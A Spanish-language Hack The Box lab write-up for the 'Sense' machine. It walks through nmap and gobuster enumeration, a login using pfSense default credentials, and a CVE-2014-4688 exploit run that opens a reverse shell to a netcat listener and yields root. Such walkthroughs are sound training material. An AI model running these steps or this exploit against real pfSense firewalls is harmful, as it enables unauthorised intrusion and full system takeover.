Sense Writeup [HTB]

Written by: X4v1l0k

Sense - 10.10.10.60

tags: HTB Easy FreeBSD

Enumeración

Nmap

$ nmap -A -Pn -p- 10.10.10.60

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 23:58 CET
Nmap scan report for 10.10.10.60
Host is up (0.033s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Comau embedded (92%)
Aggressive OS guesses: Comau C4G robot control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   32.39 ms 10.10.14.1
2   32.50 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 215.68 seconds

Directorios

gobuster dir -u https://10.10.10.60/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,bak,tar,zip,html -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,bak,tar,zip,html
[+] Timeout:        10s
===============================================================
2020/11/09 00:35:40 Starting gobuster
===============================================================
/index.html (Status: 200)
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/includes (Status: 301)
/edit.php (Status: 200)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2020/11/09 00:56:40 Finished
===============================================================

Dentro del archivo /system-users.txt encontramos que el usuario es “Rohit” y la contraseña pone que es “company defaults”.

Tras multiples pruebas, he conseguido acceder usando como usuario “rohit” y “pfsense”.

Explotación

Tenemos varios CVE entre los que hay un RCE correspondiente al CVE-2014-4688

Ponemos una terminal a la escucha y ejecutamos el exploit.

$ python3 exp.py --rhost 10.10.10.60 --lhost 10.10.14.35 --lport 8787 --username rohit --password pfsense
CSRF token obtained
Running exploit...
Exploit completed
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.35] from (UNKNOWN) [10.10.10.60] 27331
sh: can`t access tty; job control turned off
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

Bueno, pues tenemos root directamente… 🤷‍♂️

Tags

Enumeracion   RCE   OSCP Path  
X4v1l0k